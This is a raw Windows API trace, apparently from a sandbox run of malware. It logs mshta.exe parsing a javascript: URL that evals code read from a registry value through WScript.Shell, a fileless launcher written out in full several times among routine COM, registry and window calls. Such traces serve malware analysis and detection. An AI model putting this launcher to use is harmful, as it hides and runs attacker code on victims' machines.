riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18cf6c | out: ppvObject=0x18cf6c*=0x75028d2c) returned 0x0 [0066.747] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.748] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=19, dwParseFlags=0x0, pwzResult=0x18cff0, cchResult=0x1000, pcchResult=0x18cfec, dwReserved=0x0 | out: pwzResult="a큜\x18䄎盞濎깧￾￿⋦盔⑆盔Ɯ", pcchResult=0x18cfec*=0x18cf8c) returned 0x800c0011 [0066.748] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.748] ParseURLW (in: pcszURL="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ppu=0x18cfbc | out: ppu=0x18cfbc) returned 0x0 [0066.805] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.805] IUnknown:Release (This=0x63c68c) returned 0x11 [0066.805] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f0cc | out: ppvObject=0x18f0cc*=0x63c68c) returned 0x0 [0066.805] IUnknown:Release (This=0x63c68c) returned 0x11 [0066.805] IUnknown:AddRef (This=0x63c68c) returned 0x12 [0066.805] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4c) returned 0x651070 [0066.806] GetCurrentThreadId () returned 0x2a8 [0066.806] CreateBindCtx (in: reserved=0x0, ppbc=0x18f110 | out: ppbc=0x18f110*=0x64e618) returned 0x0 [0066.806] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xc) returned 0x64f808 [0066.806] IUnknown:AddRef (This=0x64e618) returned 0x2 [0066.806] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x644d58 [0066.806] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18eff4 | out: phkResult=0x18eff4*=0x198) returned 0x0 [0066.806] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18eff8 | out: phkResult=0x18eff8*=0x12c) returned 0x0 [0066.807] RegOpenKeyExW (in: hKey=0x12c, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x18efb4 | out: phkResult=0x18efb4*=0x0) returned 0x2 [0066.807] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x18efb4 | out: phkResult=0x18efb4*=0x1a0) returned 0x0 [0066.807] SHRegGetValueW () returned 0x2 [0066.807] SHRegGetValueW () returned 0x2 [0066.807] RegCloseKey (hKey=0x1a0) returned 0x0 [0066.807] RegCloseKey (hKey=0x0) returned 0x6 [0066.807] RegCloseKey (hKey=0x0) returned 0x6 [0066.807] RegCloseKey (hKey=0x198) returned 0x0 [0066.807] RegCloseKey (hKey=0x12c) returned 0x0 [0066.807] RegisterBindStatusCallback (in: pBC=0x64e618, pBSCb=0x6505a0, ppBSCBPrev=0x0, dwReserved=0x0 | out: ppBSCBPrev=0x0) returned 0x0 [0066.807] IUnknown:AddRef (This=0x6505a0) returned 0x4 [0066.807] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18f05c | out: ppvObject=0x18f05c*=0x6505a4) returned 0x0 [0066.808] IMoniker:RemoteBindToStorage (in: This=0x620638, pbc=0x64e618, pmkToLeft=0x0, riid=0x74c1f8b0, ppvObj=0x18f0a8 | out: ppvObj=0x18f0a8*=0x0) returned 0x401e8 [0066.808] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ebe0 | out: ppv=0x18ebe0*=0x75028d20) returned 0x0 [0066.808] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18eccc | out: ppvObject=0x18eccc*=0x75028d2c) returned 0x0 [0066.809] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.809] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=1, dwParseFlags=0x10000, pwzResult=0x6520a0, cchResult=0x824, pcchResult=0x18efe0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x18efe0*=0x0) returned 0x800c0011 [0066.809] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.809] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x7682ad24*(Data1=0xaaa74ef9, Data2=0x8ee7, Data3=0x4659, Data4=([0]=0x88, [1]=0xd9, [2]=0xf8, [3]=0xc5, [4]=0x4, [5]=0xda, [6]=0x73, [7]=0xcc)), ppvObject=0x18ef70 | out: ppvObject=0x18ef70*=0x6505a0) returned 0x0 [0066.809] IBindStatusCallbackEx:RemoteGetBindInfoEx (in: This=0x6505a0, grfBINDF=0x6520e4, pbindinfo=0x652194, pstgmed=0x6520e8, grfBINDF2=0x18efbc, pdwReserved=0x80004005 | out: grfBINDF=0x6520e4*=0x83, pbindinfo=0x652194, pstgmed=0x6520e8, grfBINDF2=0x18efbc*=0x0, pdwReserved=0x80004005) returned 0x0 [0066.809] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18ee90 | out: phkResult=0x18ee90*=0x12c) returned 0x0 [0066.809] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18ee94 | out: phkResult=0x18ee94*=0x198) returned 0x0 [0066.809] RegOpenKeyExW (in: hKey=0x198, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x18ee50 | out: phkResult=0x18ee50*=0x0) returned 0x2 [0066.810] RegOpenKeyExW (in: hKey=0x12c, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x18ee50 | out: phkResult=0x18ee50*=0x0) returned 0x2 [0066.810] RegCloseKey (hKey=0x0) returned 0x6 [0066.810] RegCloseKey (hKey=0x0) returned 0x6 [0066.810] RegCloseKey (hKey=0x12c) returned 0x0 [0066.810] RegCloseKey (hKey=0x198) returned 0x0 [0066.810] IUnknown:Release (This=0x6505a0) returned 0x5 [0066.810] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ef38 | out: ppvObject=0x18ef38*=0x0) returned 0x80004002 [0066.810] IServiceProvider:QueryService (in: This=0x6505a4, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ef38 | out: ppvObject=0x18ef38*=0x0) returned 0x80004002 [0066.810] GetCurrentThreadId () returned 0x2a8 [0066.810] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ee84 | out: ppv=0x18ee84*=0x75028d20) returned 0x0 [0066.811] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.812] IBindStatusCallback:OnStartBinding (This=0x6505a0, dwReserved=0xff, pib=0x6520a0) returned 0x0 [0066.812] IUnknown:AddRef (This=0x6520a0) returned 0x2 [0066.812] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.812] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ee48 | out: ppvObject=0x18ee48*=0x0) returned 0x80004002 [0066.812] IServiceProvider:QueryService (in: This=0x6505a4, guidService=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ee48 | out: ppvObject=0x18ee48*=0x0) returned 0x80004002 [0066.813] GetCurrentThreadId () returned 0x2a8 [0066.813] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ee58 | out: ppv=0x18ee58*=0x75028d20) returned 0x0 [0066.813] IClassFactory:CreateInstance (in: This=0x75028d20, pUnkOuter=0x652208, riid=0x7681482c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x65222c | out: ppvObject=0x65222c*=0x652ab8) returned 0x0 [0066.862] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x98) returned 0x652ab8 [0066.862] IUnknown_QueryService (in: punk=0x652208, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvOut=0x18ee88 | out: ppvOut=0x18ee88*=0x643cd4) returned 0x0 [0066.862] IUnknown:QueryInterface (in: This=0x6505a0, riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18ed30 | out: ppvObject=0x18ed30*=0x0) returned 0x80004002 [0066.863] IServiceProvider:QueryService (in: This=0x6505a4, guidService=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), riid=0x74ccb940*(Data1=0x332c4427, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18ed30 | out: ppvObject=0x18ed30*=0x643cd4) returned 0x0 [0066.863] GetCurrentThreadId () returned 0x2a8 [0066.933] IUnknown:QueryInterface (in: This=0x652ab8, riid=0x768146b8*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x652290 | out: ppvObject=0x652290*=0x652acc) returned 0x0 [0066.933] IUnknown:AddRef (This=0x652208) returned 0x7 [0066.933] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.933] IUnknown:Release (This=0x652acc) returned 0x6 [0066.933] IUnknown:Release (This=0x652208) returned 0x6 [0066.934] IUnknown:AddRef (This=0x652acc) returned 0x7 [0066.934] IUnknown:AddRef (This=0x652208) returned 0x7 [0066.934] IUnknown:Release (This=0x652acc) returned 0x6 [0066.934] IUnknown:Release (This=0x652208) returned 0x6 [0066.934] IUnknown:QueryInterface (in: This=0x652acc, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ef34 | out: ppvObject=0x18ef34*=0x652218) returned 0x0 [0066.934] IUnknown:QueryInterface (in: This=0x652208, riid=0x76826b10*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ef34 | out: ppvObject=0x18ef34*=0x652218) returned 0x0 [0066.934] IUnknown:QueryInterface (in: This=0x652ab8, riid=0x76826b00*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x18ef40 | out: ppvObject=0x18ef40*=0x0) returned 0x80004002 [0066.977] IUnknown:AddRef (This=0x652208) returned 0x8 [0066.977] CoInternetParseUrl (in: pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=0x13, dwFlags=0x0, pszResult=0x18cf00, cchResult=0x1000, pcchResult=0x18cee8, dwReserved=0x0 | out: pszResult="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", pcchResult=0x18cee8) returned 0x0 [0066.978] DllGetClassObject (in: rclsid=0x640b9c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cd7c | out: ppv=0x18cd7c*=0x75028d20) returned 0x0 [0066.978] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18ce68 | out: ppvObject=0x18ce68*=0x75028d2c) returned 0x0 [0066.978] IUnknown:Release (This=0x75028d20) returned 0x1 [0066.978] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\\\Software\\\\[M[ZF\\\\HMEYE'));close();", ParseAction=19, dwParseFlags=0x0, pwzResult=0x18cf00, cchResult=0x1000, pcchResult=0x18cee8, dwReserved=0x0 | out: pwzResult="쿬\x18", pcchResult=0x18cee8*=0x18cfec) returned 0x800c0011 [0066.978] IUnknown:Release (This=0x75028d2c) returned 0x1 [0066.978] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xce) returned 0x63d838 [0066.979] IUnknown:Release (This=0x64e618) returned 0x2 [0066.979] IUnknown:Release (This=0x63c68c) returned 0x17 [0066.979] IUnknown:Release (This=0x63c68c) returned 0x16 [0066.979] IUnknown:Release (This=0x63c68c) returned 0x15 [0066.979] CoTaskMemFree (pv=0x0) [0066.979] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1a8) returned 0x652b58 [0066.979] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f380 | out: lpCPInfo=0x18f380) returned 1 [0066.979] IUnknown:AddRef (This=0x63ee70) returned 0x3 [0066.979] IUnknown:AddRef (This=0x63c68c) returned 0x16 [0066.979] IUnknown:QueryInterface (in: This=0x63c68c, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f388 | out: ppvObject=0x18f388*=0x63c68c) returned 0x0 [0066.979] IUnknown:Release (This=0x63c68c) returned 0x16 [0066.979] IUnknown:AddRef (This=0x63c68c) returned 0x17 [0066.979] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f38c | out: pdwScheme=0x18f38c*=0xf) returned 0x0 [0066.980] IUnknown:Release (This=0x63ee70) returned 0x2 [0066.980] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x652d08 [0066.980] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x150 [0066.980] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74c1e718, lpParameter=0x652d08, dwCreationFlags=0x0, lpThreadId=0x652d1c | out: lpThreadId=0x652d1c*=0x92c) returned 0x12c [0066.981] GetCurrentThreadId () returned 0x2a8 [0066.981] IUnknown:Release (This=0x63c68c) returned 0x16 [0066.981] IUnknown:Release (This=0x63be1c) returned 0x3 [0066.981] IUnknown:Release (This=0x620638) returned 0x3 [0066.981] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.981] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.981] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x15 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x14 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x13 [0066.982] IUnknown:Release (This=0x620638) returned 0x2 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x12 [0066.982] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.982] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.982] CoTaskMemFree (pv=0x63cd40) [0066.982] CoTaskMemFree (pv=0x0) [0066.982] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0066.982] IUnknown:Release (This=0x63c68c) returned 0x11 [0066.982] CoTaskMemFree (pv=0x63cc68) [0066.982] GetClientRect (in: hWnd=0x40162, lpRect=0x18f8a4 | out: lpRect=0x18f8a4) returned 1 [0066.982] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x78) returned 0x621980 [0066.983] GetClientRect (in: hWnd=0x40162, lpRect=0x6219ac | out: lpRect=0x6219ac) returned 1 [0066.983] OffsetRect (in: lprc=0x6219ac, dx=0, dy=0 | out: lprc=0x6219ac) returned 1 [0066.983] OffsetRect (in: lprc=0x6219bc, dx=0, dy=0 | out: lprc=0x6219bc) returned 1 [0066.983] RegisterClassExW (param_1=0x18f3c0) returned 0xc168 [0066.983] CoCreateInstance (in: rclsid=0x74c3bf70*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x74c3bf60*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7502b020 | out: ppv=0x7502b020*=0x644ee8) returned 0x0 [0067.730] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x644ee8, aaClassList=0x18f4b8*=0xc168, uSize=0x1) returned 0x0 [0067.730] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc168, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x40162, hMenu=0x0, hInstance=0x74af0000, lpParam=0x6421f8) returned 0x202aa [0067.730] GetWindowLongW (hWnd=0x202aa, nIndex=-20) returned 0 [0067.730] SetWindowLongW (hWnd=0x202aa, nIndex=-21, dwNewLong=6562296) returned 0 [0067.730] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x81, wParam=0x0, lParam=0x18f08c*=6562296, plResult=0x18ef04 | out: plResult=0x18ef04) returned 0x1 [0067.730] NtdllDefWindowProc_W () returned 0x1 [0067.730] GetCurrentThreadId () returned 0x2a8 [0067.730] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.730] GetCurrentThreadId () returned 0x2a8 [0067.731] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.731] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x1, wParam=0x0, lParam=0x18f08c*=6562296, plResult=0x18ef04 | out: plResult=0x18ef04) returned 0x1 [0067.731] NtdllDefWindowProc_W () returned 0x0 [0067.731] GetCurrentThreadId () returned 0x2a8 [0067.731] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.731] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x18ef50 | out: plResult=0x18ef50) returned 0x1 [0067.731] NtdllDefWindowProc_W () returned 0x0 [0067.731] GetCurrentThreadId () returned 0x2a8 [0067.731] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.731] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x18ef50 | out: plResult=0x18ef50) returned 0x1 [0067.731] NtdllDefWindowProc_W () returned 0x0 [0067.731] GetCurrentThreadId () returned 0x2a8 [0067.731] NtdllDefWindowProc_W () returned 0x0 [0067.731] GetClassNameW (in: hWnd=0x40162, lpClassName=0x18f4c0, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0067.731] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0067.732] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x644ee8, fRestoreLayout=1) returned 0x0 [0067.732] SendMessageW (hWnd=0x202aa, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0067.732] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.732] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x18f374 | out: plResult=0x18f374) returned 0x1 [0067.732] NtdllDefWindowProc_W () returned 0x3 [0067.732] GetCurrentThreadId () returned 0x2a8 [0067.732] IntersectRect (in: lprcDst=0x18f6f4, lprcSrc1=0x6219ac, lprcSrc2=0x6219bc | out: lprcDst=0x18f6f4) returned 1 [0067.732] EqualRect (lprc1=0x18f6f4, lprc2=0x6219ac) returned 1 [0067.732] InvalidateRect (hWnd=0x202aa, lpRect=0x0, bErase=1) returned 1 [0067.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xf0) returned 0x652e68 [0067.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x150) returned 0x656798 [0067.732] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x140) returned 0x6568f0 [0067.732] IntersectRect (in: lprcDst=0x18f5e0, lprcSrc1=0x18f5e0, lprcSrc2=0x18f578 | out: lprcDst=0x18f5e0) returned 1 [0067.732] IntersectRect (in: lprcDst=0x18f5e0, lprcSrc1=0x18f5e0, lprcSrc2=0x18f578 | out: lprcDst=0x18f5e0) returned 1 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x60) returned 0x652f60 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x62d980 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0xec) returned 0x656a38 [0067.733] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0067.733] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d9b8 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x64f928 [0067.733] GetCurrentThreadId () returned 0x2a8 [0067.733] GetCurrentThreadId () returned 0x2a8 [0067.733] GetCurrentThreadId () returned 0x2a8 [0067.733] IntersectRect (in: lprcDst=0x18f41c, lprcSrc1=0x18f41c, lprcSrc2=0x18f3ec | out: lprcDst=0x18f41c) returned 1 [0067.733] IntersectRect (in: lprcDst=0x656950, lprcSrc1=0x656950, lprcSrc2=0x18f40c | out: lprcDst=0x656950) returned 1 [0067.733] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0067.733] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x28) returned 0x6507c0 [0067.733] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6507c0 | out: hHeap=0x610000) returned 1 [0067.733] SetWindowPos (hWnd=0x202aa, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0067.734] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.734] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x46, wParam=0x0, lParam=0x18f6d4*=131754, plResult=0x18f570 | out: plResult=0x18f570) returned 0x1 [0067.734] NtdllDefWindowProc_W () returned 0x0 [0067.734] GetCurrentThreadId () returned 0x2a8 [0067.734] GetWindowLongW (hWnd=0x202aa, nIndex=-21) returned 6562296 [0067.734] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x644ee8, hWnd=0x202aa, msg=0x47, wParam=0x0, lParam=0x18f6d4*=131754, plResult=0x18f56c | out: plResult=0x18f56c) returned 0x1 [0067.734] NtdllDefWindowProc_W () returned 0x0 [0067.734] GetCurrentThreadId () returned 0x2a8 [0067.734] SetTimer (hWnd=0x202aa, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0067.734] GetFocus () returned 0x0 [0067.734] EnumChildWindows (hWndParent=0x202aa, lpEnumFunc=0x74e10a73, lParam=0x18f5cc) returned 0 [0067.734] GetFocus () returned 0x0 [0067.734] SetFocus (hWnd=0x202aa) returned 0x0 [0067.735] 